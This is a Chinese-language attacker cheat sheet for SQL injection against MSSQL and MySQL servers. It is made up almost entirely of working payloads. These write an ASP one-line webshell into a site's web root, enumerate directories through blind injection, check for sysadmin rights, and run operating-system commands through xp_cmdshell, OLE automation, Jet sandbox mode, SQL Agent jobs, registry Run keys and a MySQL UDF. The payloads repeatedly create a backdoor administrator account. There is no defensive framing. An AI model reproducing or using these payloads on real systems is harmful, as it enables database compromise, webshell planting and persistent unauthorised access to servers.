MSSQL语句导出一句话木马
首先确定网站的WEB路径
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
//将一句话木马插入表中
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
//导出一个ASP文件
关于MSSQL列目录
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
数据库版本和权限查看
and 1=(select @@VERSION) //查看详细的数据库信息.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_OWNER
1.利用xp_cmdshell执行命令
exec master..xp_cmdshell 'net user rfire 123456 /add'
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
恢复xp_cmdshell存储过程
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2.利用SP_OAcreate和SP_OAMETHOD执行命令
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
DECLARE @shell INT //建立一个@shell实体
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
3.利用沙盒模式
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
开启沙盒模式:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
执行命令:
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
4.利用SQL代理执行命令
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
执行命令:
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
exec sp_add_job 'x'
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
6.MYSQL的命令执行
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
首先要在su.php下导出c:\windows\udf.dll
导出后执行创建自定义函数命令:
Create Function cmdshell returns string soname 'udf.dll'
执行命令:
select cmdshell('net user rfire 123456 /add')
执行后删除函数 drop function cmdshell